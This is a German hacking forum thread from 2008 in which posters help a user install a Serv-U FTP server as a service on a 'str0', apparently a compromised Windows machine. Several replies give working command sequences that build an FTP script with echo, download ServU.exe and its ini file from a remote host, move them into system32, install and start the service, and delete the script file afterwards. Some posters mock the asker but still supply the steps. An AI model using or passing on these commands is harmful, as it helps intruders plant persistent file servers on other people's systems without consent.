#1 17. November 2008 Hi Comunity, Also mein problem so weit habe ich die servu datein aufm str0 aber in der anleitung steht nochdas ich das machen muss ftp.exe -i -n -v -s:windows24.txt //Auf antwort warten und nicht verzweifeln\\ "Name der .exe MIT der Endung" /i net start "Servicename" und da blicke ich net mehr durch was ich da eingeben soll für ne exe und wo ich das /i hinmachen soll bitte um hilfe.. ihr könnt mich auch adden per icq 298-217-810.. thx im voraus Pistolfreak + Multi-Zitat Zitieren
#2 17. November 2008 AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter du hast ja deine servu dateien hochgeladen eine davon sollte mit .exe enden (im original servudaemon.exe) jetzt hast du deine files wahrscheinlich im system32 also schreibst du Code: %windir%\system32\servudaemon.exe /i wenn deine exe anders heißt, ersetzt du eben servudaemon mit deinem individuellen namen (nicht dem, der aufm perso steht sondern dem der datei) du kannst auch Code: -install /install -i schreiben das verzeichnis ist ggf. auch noch anzupassen + Multi-Zitat Zitieren
#3 17. November 2008 AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter liegen die denn im system32 ordner ich habe die nur mit dem befehl geschoben ftp.exe -i -n -v -s:windows24.txt und wenn ich denn ServUDaemon.exe /i eingebe (ist auch richtig) bekomm ich nicht ist auch richtig so nur jetzt wenn ich net start Servicename eingebe bekomm ich The service name is invalid ist das falsch kann ich da was machen oder ist der str0 denn doof?? + Multi-Zitat Zitieren
#4 17. November 2008 AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter ja aber was steht bei dir in der windows24.txt ? da musst doch was reingeschrieben hast ^^ bei mir sieht es fast so aus ^^ Code: echo open 2.3.3.2>>c:\tmpry.log echo user anonymous ftp@ftp.com>>c:\tmpry.log echo BINARY>>c:\tmpry.log echo get Servu.exe>>c:\tmpry.log echo get servu.ini>>c:\tmpry.log echo quit>>c:\tmpry.log ftp -n -v -s:c:\tmpry.log move Servu.exe %windir%\system32 move servu.ini %windir%\system32 damit geht das ganze zeug erstmal in c:\ und dann verschiebe ich es mit "move" in system32 ... + Multi-Zitat Zitieren
#5 17. November 2008 AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter Gib einfach mal Code: dir deinservuname.exe ein dann wird der Pfad ausgegeben wo sich deine Datei befindet! + Multi-Zitat Zitieren
#6 17. November 2008 AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter Lass es, du hast keine Ahnung, was du eingibst, weißt die Basis Eingaben in der WINDOWS CMD nicht. Lass es einfach. Ansonsten: Was steht in der windows24.txt drin? Da gibst du einen Ordner an, in den die ganzen Dateien geladen werden sollen. In den musst du rein in die servu installieren. E:/ Oh noes, 3 Posts in 1 Minute. + Multi-Zitat Zitieren
#7 17. November 2008 AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter wenn du keine angabe machst wo die dateien landen sollen so landen die immer automatisch bei system32 also in dem fall joa + Multi-Zitat Zitieren
#8 17. November 2008 AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter ja so sieht es ungefähr aus nur da smove habe ich net _________________________________________ und jetzt habe ich eingegeben net start %windir%\system32\ServUDaemon.exe also müsste er sie ja jetzt starten habe auch danach eine leere nachricht bekommen.. aber irgentwie kann ich mich nicht wirklich connecten mit flash fxp + Multi-Zitat Zitieren
#9 17. November 2008 AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter ja also move Servu.exe %windir%\system32 move servu.ini %windir%\system32 das noch moven und dann %windir%\system32\Servu.exe /i net start servu del c:\tmpry.log ab jetzt sollte die servu laufen und dein txt file gelöscht sein zur überprüfung ob sie läuft einfach sc query mal ne sache, nebenbei du solltest schon mit windows cmd umgehen können, weil das ist ja noch das einfachste an dem ganzen .... denke ohne vorwissen kommst nicht weit bzw wenn dir nicht zusätzlich was aneignest wird es auch nichts + Multi-Zitat Zitieren
#10 17. November 2008 AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter Wie sinnvoll ist es, dass in der Datei noch das eigentliche "echo command" vorhanden ist?! Und PS: Wozu die ganzen Parameter? Man sollte nicht nur sinnlos Tuts anwenden, die irgend nen Vollnap ausm RR geschrieben/kopiert hat. Das -s reicht vollkommen aus. PPS: Echo Open 127.0.0.1 21>>1.txt Echo eHArds51>>1.txt Echo ESewRa95>>1.txt Echo Binary>>1.txt Echo GET ServU.exe>>1.txt Echo GET ServU_ini.ini>>1.txt Echo Quit>>1.txt FTP.exe -s:1.txt Mehr musst du nicht machen um die files zu holen. Die landen dann in dem Verzeichnis, wo deine cmd ist (sollte wohl im system32 sein). Ausführen dann mit: ServU.exe /i net start ServU_Dienst_Name Und PPPS: den -i oder -install kannst vergessen beim Starten @ wer auch immer das gesagt hat. Und was am wichtigsten ist: Man sollte nicht wild "Str0 haxxorn", wenn man keine Ahnung von Windows hat. Das ist nichts wildes sich dei Befehle mal von Grund auf anzusehen und das zu verstehen... Und lass diese billige "leet Str0 haxxor" Schrift, das geht einen nur sinnlos auf den Sack und ist peinlich³. Mfg Halloweenracer + Multi-Zitat Zitieren
#11 17. November 2008 AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter recht hatter bis auf die tatsache, dass -i bzw -install nicht zu verachten ist ;D also kannste wirklich nutzen die ****nswitches können wirklich weg, kannst notfalls mit ftp /? nochmal nachschlagen entweder du ziehst dir tutorials rein bist du dumm stirbst oder versuchst mal eigeninitiative zu ergreifen und guckst, welcher cmd was macht, welcher switch was bewirkt und warum es sinnvoll ist, diesen dort anzuwenden gl & hf beim "hacken" mfg black. edit: ja darüber werde ich eine facharbeit verfassen... nicht ich gebe nach, da ich das nicht überprüfen kann/will ..tun wir + Multi-Zitat Zitieren
#12 17. November 2008 AW: Hilfe bei Str0 haxxorn?? weiß net mehr weiter Hoi, wenn du das ganze mal in ne Studie packen würdest, dann würde -i / -install mehr Fehler verursachen als /i Ist nunmal so ^^ Aber ich denke, wir verstehn uns.. ^^ Mfg Halloweenracer + Multi-Zitat Zitieren